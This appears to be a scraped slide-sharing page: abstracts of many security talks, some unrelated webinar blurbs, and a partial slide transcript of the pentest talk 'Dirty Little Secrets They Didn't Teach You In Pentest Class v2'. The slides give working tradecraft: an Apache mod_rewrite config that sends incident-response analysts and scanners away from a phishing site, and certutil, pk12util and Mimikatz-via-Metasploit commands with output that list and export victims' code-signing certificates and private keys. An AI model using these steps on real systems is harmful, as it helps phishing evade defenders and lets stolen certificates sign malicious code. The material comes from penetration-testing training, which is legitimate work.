This talk (hopefully) provides some new pentesters tools and tricks. Basically a continuation of last year’s Dirty Little Secrets they didn’t teach you in Pentest class. Topics include; OSINT and APIs, certificate stealing, F**king with Incident Response Teams, 10 ways to psexec, and more. Yes, mostly using metasploit.
Red Team Tactics for Cracking the GSuite Perimeter - Mike Felch
As more corporations adopt Google for providing cloud services they are also inheriting the security risks associated with centralized computing, email and data storage outside the perimeter. In order for pentesters and red teamers to remain effective in analyzing security risks, they must adapt techniques in a way that brings value to the customer.
In this presentation we will begin by demonstrating adaptive techniques to crack the perimeter of Google Suite customers. Next, we will show how evasion can be accomplished by hiding in plain-sight due to failures in incident response plans. Finally, we will also show how a simple compromise could mean collateral damage for customers who are not carefully monitoring these cloud environments.
Talk Venue: BSides Tampa 2020
Speakers: Mike Felch & Joff Thyer
This talk will focus on the many different ways that a penetration tester, or Red Teamer can leverage the Python programming language during offensive operations. Python is a rich and powerful programming language which above all else allows a competent developer to very quickly write new tools that might start as a Proof of Concept, but soon become an invaluable addition to the Red Teamer's tool-belt. Having the skills to both generate new tools, and modify existing tools on the fly is critically important to agility during testing engagement. Everything from utility processing of data, network protocol, API interaction, and exploit development can be rapidly developed due to the high functionality level and intuitive nature of Python.
Why isn't infosec working? Did you turn it off and back on again? - Rob Fuller
BruCon 2019 Keynote -=> My name is Rob Fuller, I've been around a bit, not as long as some but longer than others. From the US military to government contracting, consulting, large companies, tiny startups and Silicon Valley behemoths, from podcasting to television, I've had a storied and humbling career in infosec. Let’s get past complaining about blinky lights and users. Let’s talk about what actually works and what doesn't.
Cloud security best practices in AWS by: Ankit Giri - OWASP Delhi
Cloud Security:
Some interesting instances of breaches
Best practices to protect an AWS account from unauthorized access and usage
What and how to look for security loopholes
Audit scripts
What one should learn to safeguard a cloud application
DevOops & How I hacked you - DevopsDays DC June 2015 - Chris Gates
In a quest to move faster, organizations can end up creating security vulnerabilities using the tools and products meant to protect them. Both Chris Gates and Ken Johnson will share their collaborative research into the technology driving DevOps as well as share their stories of what happens when these tools are used insecurely as well as when the tools are just insecure.
Technologies discussed will encompass AWS Technology, Chef, Puppet, Hudson/Jenkins, Vagrant, Kickstart and much, much more. This talk will most definitely be an entertaining one but a cautionary tale as well, provoking attendees into action. Ultimately, this is research targeted towards awareness for those operating within a DevOps environment.
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland - CODE BLUE
In June, thousands of Facebook users complained that they had been infected by a virus through their accounts after they received a message from a Facebook friend claiming they had mentioned them in a comment. Kaspersky Lab researcher Ido Naor and Dani Goland, CEO & founder of Undot, decided to investigate. They quickly discovered that the message had in fact been initiated by attackers and unleashed a two-stage attack on recipients. The first stage of the attack started when the user clicked on the “mention”. A malicious file seized control of their browsers, terminating the legitimate session and replacing it with a malicious one that captured their entire web traffic. The second stage included a highly sophisticated script that took over victims' Facebook and Google Drive accounts. After puzzling over the script, they managed to extract the proverbial needle from a haystack: an unknown Facebook vulnerability that allowed an attacker to exploit the notifications functionality.
In this talk, Dani and Ido will dive into the bites and bytes of the campaign and explain how the attackers exploited Facebook to spread the malware.
--- Ido Naor
Ido is a senior security researcher at the Global Research & Analysis Team (GReAT), Kaspersky Lab. He joined Kaspersky two years ago and is leading the regional research in Israel.
Ido specializes in malware analysis, penetration testing and software reverse engineering and has been credited for his work by major enterprises such as: Google, Facebook, Linkedin, Alibaba and more.
Aside from research, Ido is a martial arts expert and a father of two daughters.
--- Dani Goland
Dani is the CEO and founder of Undot, an Israeli-based startup that developed a unified remote-control application to control home appliances.
Dani has more than a decade of experience in programming on a variety of frameworks and languages.
Aside from managing Undot, Dani is a frequent competitor in hackathons (programming competitions) and won first place at HackTrackTLV 2016 and eBay Hackathon 2015.
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security Team - OWASP Delhi
This slide deck is all about Google bug hunting.
How should you report a bug?
What should you consider while reporting?
The life cycle of your vulnerability report submission
Automating Attacks Against Office365 - BsidesPDX 2016 - Karl Fosaaen
The move to Office365 has become increasingly popular in the last few years. As a penetration tester, I'm seeing more organizations shuttle their domain credentials up to the cloud for easier management of their Office365 environment. By federating with Microsoft, many organizations are exposing a larger attack surface area to the internet. During this talk, I will show you how to identify domains that are Microsoft managed, help you guess passwords for users on those domains, and show you how to pivot from the cloud environment into a company's internal network. Since manually completing attacks against these endpoints can be tedious, I've created some PowerShell tools to help automate these attacks. We'll go over how to use these tools from an external penetration test perspective and show how Office365 in the cloud can be a great target for attackers.
Denis Zhuchinski: Ways of enhancing application security - Аліна Шепшелей
In this lecture we will talk about what an application developer should know and consider when building an application to ensure the safe handling of confidential user data.
This talk shows the possibilities of reversing Android applications. After an introduction about Android issues in the past, Tobias Ospelt explains how he managed to download several thousand Android applications from the Google Market, and which security issues are present in various apps. Apps can be decompiled, altered and recompiled, which means that for most apps it is very easy to steal code or to include malware. Some of the apps use obfuscation to disguise the code, but encryption keys, for example, can still easily be extracted. Small game developers, as well as big companies, are not aware of the risk that their code can be decompiled to Java and disassembled to smali code. This is how a lot of protection mechanisms can be circumvented, such as licensing (cracking a game) or corporate solutions (enforcing policies on the mobile device). The talk shows how easily anyone can reverse Android apps and how encryption keys can be extracted, even when the code is obfuscated. The material is a nice follow-up to the Android talk of Jesse Burns from last year at #days, although this talk is more focused on the apps and shows some more hacks/code/encryption/obfuscation/reversing.
Bio: Tobias Ospelt is working as a security expert and tester for Dreamlab Technologies AG in Bern. He is mainly involved in web application and mobile security penetration tests. Tobias Ospelt joined Dreamlab after having achieved his Master's degree focusing on IT security, and after having worked as a Research Assistant at the Zurich University of Applied Sciences.
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit... - Benjamin Delpy
This talk will focus on how Windows authentication works in the real world and what the popular attacks against it are. You will learn the thought process of attackers in the real world and how it differs from a defender’s perspective. We’ll also cover post-exploitation tools and techniques such as Mimikatz. Finally, we’ll discuss next steps – how do you design services that are breach-resistant and make authentication harder to crack?
OWASP SF - Reviewing Modern JavaScript Applications - Lewis Ardern
When dealing with modern JavaScript applications, many penetration testers approach from an ‘outside-in’ perspective; this approach often misses security issues in plain sight. This talk will attempt to demystify common JavaScript issues which should be better understood/identified during security reviews. We will discuss reviewing applications in a code-centric manner by using freely available tools to help start identifying security issues through processes such as linting and dependency auditing.
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards - SecuRing
The presentation focuses on the whole process of security testing and presents it by analogies to web applications, which are quite well known. It covers the whole SDLC and shows the similarities and differences in the arsenal of vulnerabilities, security tools and standards between smart contracts and web applications at each step. Even though there exist a lot of great security projects for smart contracts, we do not have a single, widely accepted security standard (such as ASVS in the web apps world). That is why we introduce SCSVS (Smart Contract Security Verification Standard), an open-source 13-part checklist created to standardize the security of smart contracts for developers, architects, security reviewers and vendors.
DevOops Redux - Ken Johnson, Chris Gates - AppSec USA 2016 - Chris Gates
In a follow-up to the duo’s offensive focused talk “DevOops, How I hacked you”, they discuss defensive countermeasures and real experiences in preventing attacks that target flaws in your DevOps environments. In this talk, Chris and Ken describe common ways in which DevOps environments fall prey to malicious actors with a focus on preventative steps. The team will present their recommended approach to hardening for teams using AWS, Continuous Integration, GitHub, and common DevOps tools and processes. More specifically, the following items will be demonstrated:
-AWS Hardening
-AWS Monitoring
-AWS Disaster Recovery
-GitHub Monitoring
-OPINT
-Software Development Practices/Processes
-Secure use of Jenkins/Hudson
-Developer laptop hardening (OS X)
A follow on to the Encyclopedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats.
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015 - Chris Gates
In a rare mash-up, DevOps is increasingly blending the work of both application and network security professionals. In a quest to move faster, organizations can end up creating security vulnerabilities using the tools and products meant to protect them. Both Chris Gates (carnal0wnage) and Ken Johnson (cktricky) will share their collaborative research into the technology driving DevOps as well as share their stories of what happens when these tools are used insecurely as well as when the tools are just insecure.
Technologies discussed will encompass AWS Technology, Chef, Puppet, Hudson/Jenkins, Vagrant, Kickstart and much, much more. Everything from common misconfigurations to remote code execution will be presented. This is research to bring awareness to those responsible for securing a DevOps environment.
Going Purple: From full time breaker to part time fixer: 1 year later - Chris Gates
A little over a year ago I made the transition from external security consultant to internal offensive security engineer at Facebook. I went from a full time breaker to part time fixer. This talk is aimed at providing lessons learned and documenting the mindset changes I've made over the last year that I feel can be used by the industry as a whole. I've broken the lessons learned into three primary buckets; Red, Blue, and Purple and the talk will hopefully bring value to anyone working in their respective bucket or assist in their creation/continuing of purple teaming at their company.
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch... - Chris Gates
Brucon 2016
The evolution chain in security testing is fundamentally broken due to a lack of understanding, reduction of scope, and a reliance on vulnerability “whack a mole.” To help break the barriers of the common security program we are going to have to divorce ourselves from the metrics of vulnerability statistics and Pavlovian risk color charts and really get to work on how our security programs perform during a REAL event. To do so, we must create an entirely new set of metrics, tests, procedures, implementations and repeatable processes. It is extremely rare that a vulnerability causes a direct risk to an environment; it is usually what the attacker DOES with the access gained that matters. In this talk we will discuss the way that internal and external teams have been created to simulate a REAL WORLD attack and work hand in hand with the defensive teams to measure the environment's resistance to the attacks. We will demonstrate attacks, capabilities, TTP tracking, trending, positive metrics, hunt integration and, most of all, we will lay out a road map to STOP this nonsense of Red vs BLUE and realize that we are all on the same team, sparring and training every day to be ready for the fight when it comes to us.
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone - Sector... - Chris Gates
Sector 2016 Chris Gates & Haydn Johnson
Purple Teaming is conducting focused Red Teams with clear training objectives for the Blue Team for the ultimate goal of improving the organization’s overall security posture. The popular opinion is that Purple Teaming requires a big undertaking. This is not true and we will show practical exercises for Purple Teaming for varying levels of organizational maturity using the Cyber Kill Chain[1] as our framework.
DevOOPS: Attacks and Defenses for DevOps Toolchains - Chris Gates
DevOps toolchains are transforming modern IT, but hackers can undermine their benefits through poorly implemented or vulnerable DevOps tools. Chris Gates and Ken Johnson will share their collaborative attack research into the technology driving DevOps. They will share an attacker's perspective on exploiting DevOps organizations and the countermeasures these organizations should employ.
RSAC 2017
Ken Johnson & Chris Gates
Cecyf / Coriin - mimikatz and Windows memory - Benjamin Delpy
mimikatz and Windows memory, presented in Lille for Coriin as part of the Cecyf
The different ways of using process memory on Windows, in order to:
obtain keys, passwords, PIN codes, Kerberos tickets
but also manipulate authentication handling, user accounts in AD, etc.
mimikatz @ sthack
http://blog.gentilkiwi.com/mimikatz
A short presentation introducing new methods for recovering credentials on Windows, including versions 8.1/2012r2.
Demonstration of the kerberos and sekurlsa modules.
Presentation on topics beyond conventional ethical hacking; discusses job factors and scope in the security field :) This was presented at LPU (Lovely Professional University) as a seminar with over 200 attendees. Meet me on FB if you want it: fb/nipun.jaswal
Abusing bleeding edge web standards for appsec glory - Priyanka Aash
"Through cooperation between browser vendors and standards bodies in the recent past, numerous standards have been created to enforce stronger client-side control for web applications. As web appsec practitioners continue to shift from mitigating vulnerabilities to implementing proactive controls, each new standard adds another layer of defense for attack patterns previously accepted as risks. With the most basic controls complete, attention is shifting toward mitigating more complex threats. As a result of the drive to control for these threats client-side, standards such as SubResource Integrity (SRI), Content Security Policy (CSP), and HTTP Public Key Pinning (HPKP) carry larger implementation risks than others such as HTTP Strict Transport Security (HSTS). Builders supporting legacy applications actively make trade-offs between implementing the latest standards versus accepting risks simply because of the increased risks newer web standards pose.
In this talk, we'll strictly explore the risks posed by SRI, CSP, and HPKP; demonstrate effective mitigation strategies and compromises which may make these standards more accessible to builders and defenders supporting legacy applications; as well as examine emergent properties of standards such as HPKP to cover previously unforeseen scenarios. As a bonus for the breakers, we'll explore and demonstrate exploitations of the emergent risks in these more volatile standards, to include multiple vulnerabilities uncovered quite literally during our research for this talk (which will hopefully be mitigated by d-day)."
(Source: Black Hat USA 2016, Las Vegas)
Externally Testing Modern AD Domains - Arcticcon - Karl Fosaaen
Externally federated domain endpoints are an exciting target for Red Team assessments. While often overlooked, externally federated domain services can provide multiple access points to an internal network, from the internet. This talk will cover enumeration of federated domains (ADFS and AzureAD), the enumeration of federated services (Office365, Skype for Business, etc.), and attacks that you can leverage against these endpoints to gain access to an internal network. Additional PowerShell tools will be included in the talk to help you automate these attacks.
Security is more critical than ever with new computing environments in the cloud and expanding access to the internet. There are a number of security protection mechanisms available for MongoDB to ensure you have a stable and secure architecture for your deployment. Dave Erickson will walk through general security threats to databases and specifically how they can be mitigated for MongoDB deployments. Rob Moore will then go into depth on the specific topic of setting up and running MongoDB with TLS/SSL and x.509 authentication covering how it works and common errors he's encountered in the field.
This is my presentation from Denver Startup Week 2016 on security for applications and servers. This presentation covers everything you need to know about securing a Linux server and your application.
Practical security - access control, least privilege, cryptography at work, security attacks and pen testing your system with Metasploit. The enemy knows the system. Not security by obscurity.
Your data is much safer at home than it is letting some corporation "take care of it" for you, right? Security reviews for some of the top vendors' devices reveal many interesting findings. Like everything else, there are bugs. But knowing what kinds of bugs and how the vendors have responded will allow you to better understand the impact of plugging these devices into your network. Jeremy will show you just how low access control and least privilege are on their list of priorities. He'll also explore the amount of test collateral and debug interfaces sloppily left shipping to consumers. From remote roots to stealing social network tokens to just plain weird stuff, he'll expand on how it's not just about what they do, but also what they don't do. And he'll give you some useful guidelines on how to close the gaps yourself.
Intro slides for a tutorial on hacking common vulnerabilities and how to prevent those problems in your own code. This is a PHP based tutorial that's hands on, but the slides can help as reference material for a few common hacks
Socially Acceptable Methods to Walk in the Front Door (Mike Felch)
With initial access vectors getting scarce and the threat landscape evolving at a rapid pace, red teams are beginning to reconsider their angle of pursuit. This has caused old means of entry to be revisited in new ways while also paving the way for new entry techniques for emerging technologies. We will introduce novel approaches to gaining remote read and write access to a user's Microsoft Windows file system for exfiltrating sensitive files and planting droppers. Additionally, we will share some unique research on Microsoft Azure tokens and compromising access with minimal effort leading to cloud pivoting opportunities. Attendees can expect to learn about some new red team tradecraft for traditional technologies, innovative tradecraft for emerging cloud environments, and a handful of offsec tools designed to regain traction with initial access.
This talk was given live at WWHF 2021.
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure (MongoDB)
Your MongoDB Community Edition database can probably be a lot more secure than it is today, since Community Edition provides a wide range of capabilities for securing your system, and you are probably not using them all. If you are worried about cyber-threats, take action to reduce your anxiety!
Contrary to most presentations and blog posts there is more to AWS than S3. In a quest to create more re-usable code we have created WeirdAAL (AWS Attack Library). Offensively, WeirdAAL helps you answer the “what can I do with this AWS key”? We aim to answer that question, in a blackbox way, via recon modules and modules specifically dedicated to attack each of the interesting AWS service offerings while avoiding detection. It also provides multiple functions sorted by AWS service that you can use for both offensive and defensive checks.
Adversarial Simulation, Nickerson/Gates, Wild West Hacking Fest Oct 2017 (Chris Gates)
The evolution chain in security testing is fundamentally broken due to a lack of understanding, reduction of scope, and a reliance on vulnerability “whack a mole.” To help break the barriers of the common security program we are going to have to divorce ourselves from the metrics of vulnerability statistics and Pavlovian risk color charts and really get to work on how our security programs perform during a REAL event. To do so, we must create an entirely new set of metrics, tests, procedures, implementations and repeatable process. It is extremely rare that a vulnerability causes a direct risk to an environment; it is usually what the attacker DOES with the access gained that matters. In this talk, we will discuss the way that internal and external teams have been created to simulate a REAL WORLD attack and work hand in hand with the defensive teams to measure the environment's resistance to the attacks. We will demonstrate attacks, capabilities, TTP tracking, trending, positive metrics, hunt integration and most of all we will lay out a road map to STOP this nonsense of Red vs BLUE and realize that we are all on the same team, sparring and training every day to be ready for the fight when it comes to us. This is an update to our 2016 Brucon talk. We plan to discuss what we have accomplished regarding the above in the last year. We plan to show how we have progressed with the automation of attacker activities and event generation using MITRE’s Cyber Analytics Repository & CAR Exploration Tool (CARET) along with pumping these results to Unfetter (https://iadgov.github.io/unfetter/) for aggregation and display in a useful format.
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class (Chris Gates)
Derbycon 2011
This talk is about methodologies and tools that we use or have coded that make our lives and pentest schedule a little easier, and why we do things the way we do. Of course, there will be a healthy dose of Metasploit in the mix.
Big Bang Theory: The Evolution of Pentesting High Security Environments (Chris Gates)
This presentation focuses on pentesting high security environments, new ways of identifying/bypassing common security mechanisms, owning the domain, staying persistent, and ex-filtrating critical data from the network without being detected. The term Advanced Persistent Threat (APT) has caused quite a stir in the IT Security field, but few pentesters actually utilize APT techniques and tactics in their pentests.
Essentials of Automations: Optimizing FME Workflows with Parameters (Safe Software)
Are you looking to streamline your workflows and boost your projects’ efficiency? Do you find yourself searching for ways to add flexibility and control over your FME workflows? If so, you’re in the right place.
Join us for an insightful dive into the world of FME parameters, a critical element in optimizing workflow efficiency. This webinar marks the beginning of our three-part “Essentials of Automation” series. This first webinar is designed to equip you with the knowledge and skills to utilize parameters effectively: enhancing the flexibility, maintainability, and user control of your FME projects.
Here’s what you’ll gain:
- Essentials of FME Parameters: Understand the pivotal role of parameters, including Reader/Writer, Transformer, User, and FME Flow categories. Discover how they are the key to unlocking automation and optimization within your workflows.
- Practical Applications in FME Form: Delve into key user parameter types including choice, connections, and file URLs. Allow users to control how a workflow runs, making your workflows more reusable. Learn to import values and deliver the best user experience for your workflows while enhancing accuracy.
- Optimization Strategies in FME Flow: Explore the creation and strategic deployment of parameters in FME Flow, including the use of deployment and geometry parameters, to maximize workflow efficiency.
- Pro Tips for Success: Gain insights on parameterizing connections and leveraging new features like Conditional Visibility for clarity and simplicity.
We’ll wrap up with a glimpse into future webinars, followed by a Q&A session to address your specific questions surrounding this topic.
Don’t miss this opportunity to elevate your FME expertise and drive your projects to new heights of efficiency.
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024 (Tobias Schneck)
As AI technology pushes into IT, I was wondering, as an “infrastructure container kubernetes guy”, how this fancy AI technology gets managed from an infrastructure operations point of view. Is it possible to apply our lovely cloud native principles as well? What benefits could both technologies bring to each other?
Let me take these questions and provide you a short journey through existing deployment models and use cases for AI software. Using practical examples, we discuss what cloud/on-premise strategy we may need to apply it to our own infrastructure and make it work from an enterprise perspective. I want to give an overview of infrastructure requirements and technologies that could benefit or limit your AI use cases in an enterprise environment. An interactive demo will give you some insights into which approaches I already have working for real.
Key Trends Shaping the Future of Infrastructure.pdf (Cheryl Hung)
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
State of ICS and IoT Cyber Threat Landscape Report 2024 preview (Prayukth K V)
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
UiPath Test Automation using UiPath Test Suite series, part 4 (DianaGray10)
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques.
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
DevOps and Testing slides at DASA Connect (Kari Kakkonen)
My and Rik Marselis' slides from the 30.5.2024 DASA Connect conference. We discuss what testing is, then what agile testing is, and finally what testing in DevOps is. We closed with a lovely workshop in which the participants tried to find different ways to think about quality and testing in the different parts of the DevOps infinity loop.
The Art of the Pitch: WordPress Relationships and Sales (Laura Byrne)
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if something changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Connector Corner: Automate dynamic content and events by pushing a button (DianaGray10)
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality (Inflectra)
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
2. Whoami
• Rob Fuller (mubix)
– Twitter -> mubix
– Blog -> http://www.room362.com
– NoVA Hackers
• Previous Talks
– Dirty Little Secrets
– Networking for Penetration Testers
– Metasploit Framework/Pro Training for Rapid7
– Deep Magic 101
– Couch to Career in 80 hours
3. Whoami
• Chris Gates (CG)
– Twitter carnal0wnage
– Blog carnal0wnage.attackresearch.com
– Job Partner/Principal Security Consultant at Lares
– NoVAHackers
• Previous Talks
– ColdFusion for Pentesters
– From LOW to PWNED
– Dirty Little Secrets
– Attacking Oracle (via web)
– wXf Web eXploitation Framework
– Open Source Information Gathering
– Attacking Oracle (via TNS)
– Client-Side Attacks
4. Infoz
• No philosophical stuff this time
– Just digging in and showing neat shit we’ve been doing since last year
– Last year’s stuff still applies although we were told we were “preaching to the choir”…who still doesn’t do it…maybe on Sundays…
– Anyway…
5. Agenda
• Putting in the hours on LinkedIn for SE
• Giving IR teams a run for their money
• Stealing certs
• Mimikatz with Metasploit
• New Incognito && Netview release
• Ditto
• 10 ways to PSEXEC
• Why doesn’t SYSTEM have proxy settings!?!
• Windows is my backdoor (bitsadmin, powershell, wmi )
• WebDAV server via metasploit
• Turning your External Pentest into an Internal one
• Overview of current DNS Payload options (if time)
6. The setup…
We like to use LinkedIn for OSINT but how can we do it better?
7. Becoming a LiON
• Why?
• API is based on YOUR connections
• 2nd and 3rd level connections count but are given different access
• Creating a fake account
• Connecting with Recruiters ++
• Connecting with “Open Networkers”
8. LinkedIn API
• URL: https://developer.linkedin.com
• Allows you to query information
– Company info
– Groups
– Names of your 1st & 2nd order connections
9. Big Ass LinkedIn Network
• Meet “John”
• John has been busy being awesome on LinkedIn for the last few months
11. LinkedIn API
• Limited by YOUR connections and network reach
• API gives you NO info about 3rd order connections
• Usually you’ll see more info via the web on 3rd order people
• The total number of search results possible for any search will vary depending on the user's account level.
22. Phishing and F**king with IR Teams
• Thanks to people like SANS, organizations have a standardized, repeatable process
– What’s not to like?
– Submit to the sandbox
– Submit to the malware lookup site
– I feel safe!
• But, sure does suck when you spend all that time setting up a phish only to have it ruined by this well tuned, standardized process…
23. Phishing and F**king with IR Teams
• What you *could* do…
– Build a phish that EVERYONE will report
– Capture the IR process via log/scan/analyst activity
• This gives you intel on:
– Which services are contracted out for analysis
• And their IPs
– Are humans in the mix
• And their IPs
– Level of sophistication
24. Phishing and F**king with IR Teams
• Once you know who’s coming to do analysis, we can send them to an alternate site and keep the users going to the phish site.
• How?
25. Phishing and F**king with IR Teams
• Apache and mod_rewrite is an option
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^$ [OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(HTTrack|clshttp|archiver|loader|email|nikto|miner|python|wget|Wget).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|libwww-perl|curl|libcurl|harvest|scan|grab|extract).* [NC,OR]
# outside IR
RewriteCond %{REMOTE_ADDR} ^188\.168\.16\.164$ [OR]
# googlebot
RewriteCond %{REMOTE_ADDR} ^66\.249\.73\.136$ [OR]
RewriteCond %{REMOTE_ADDR} ^88\.88\.
RewriteRule ^(/.*) http://www.totallysafesite.com/$1 [R,L]
26. The setup…
I want to find and steal code signing certificates from victims
27. Stealing Certificates
• Why?
• Have you tried to get/buy one? It’s a pain in the ass.
– I see why people just steal them
• Impact
– Sign code as the company
– Now your code may be *more* trusted by the victim…or at least less suspicious
– Can you steal their wildcard SSL cert?
28. Stealing Certificates
• If you export one, it has to have a password
• However, if YOU export it, YOU can set the password.
• You can do this all on the command line
– Use Mozilla’s certutil
• http://www.mozilla.org/projects/security/pki/nss/tools/certutil.html
– Use Mimikatz
29. Stealing Certificates
• Mozilla certutil
• Compile your own, or download precompiled bins
certutil.exe -L -d C:\Users\CG\AppData\Roaming\Mozilla\Firefox\Profiles\6smdhwru.default-1339854577637
VeriSign Class 3 Extended Validation SSL CA ,,
DigiCert High Assurance CA-3 ,,
VeriSign Class 3 International Server CA - G3 ,,
COMODO Extended Validation Secure Server CA 2 ,,
Verified Publisher LLC's COMODO CA Limited ID u,u,u <------- code signer
Akamai Subordinate CA 3 ,,
VeriSign, Inc. ,,
--snip--
30. Stealing Certificates
• Mozilla certutil
• -L: List all the certificates, or display information about a named certificate, in a certificate database.
certutil.exe -L -d C:\Users\CG\AppData\Roaming\Mozilla\Firefox\Profiles\6smdhwru.default-1339854577637
VeriSign Class 3 Extended Validation SSL CA ,,
DigiCert High Assurance CA-3 ,,
VeriSign Class 3 International Server CA - G3 ,,
COMODO Extended Validation Secure Server CA 2 ,,
Verified Publisher LLC's COMODO CA Limited ID u,u,u
Akamai Subordinate CA 3 ,,
VeriSign, Inc. ,,
--snip--
• “u”: Certificate can be used for authentication or signing
• http://www.mozilla.org/projects/security/pki/nss/tools/certutil.html
31. Stealing Certificates
• Mozilla pk12util.exe
• To extract the cert:
C:\Users\CG\Downloads\nss-3.10\nss-3.10\bin>pk12util.exe -n "Verified Publisher LLC's COMODO CA Limited ID" -d C:\Users\CG\AppData\Roaming\Mozilla\Firefox\Profiles\6smdhwru.default-1339854577637 -o test2.p12 -W mypassword1
• http://www.mozilla.org/projects/security/pki/nss/tools/pk12util.html
32. Stealing Certificates
Via Mimikatz (list certs)
execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My" exit'
Process 3472 created.
Channel 12 created.
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz(commandline) # crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My
Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My
 - sqlapps01
    Container Clé : SELFSSL
    Provider : Microsoft RSA SChannel Cryptographic Provider
    Type : AT_KEYEXCHANGE
    Exportabilité : OUI
    Taille clé : 1024
mimikatz(commandline) # exit
33. Stealing Certificates
Via Mimikatz (export certs)
execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" exit'
Process 6112 created.
Channel 23 created.
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz(commandline) # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE
Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My
 - sqlapps01
    Container Clé : SELFSSL
    Provider : Microsoft RSA SChannel Cryptographic Provider
    Type : AT_KEYEXCHANGE
    Exportabilité : OUI
    Taille clé : 1024
    Export privé dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_sqlapps01.pfx' : OK
    Export public dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_sqlapps01.der' : OK
mimikatz(commandline) # exit
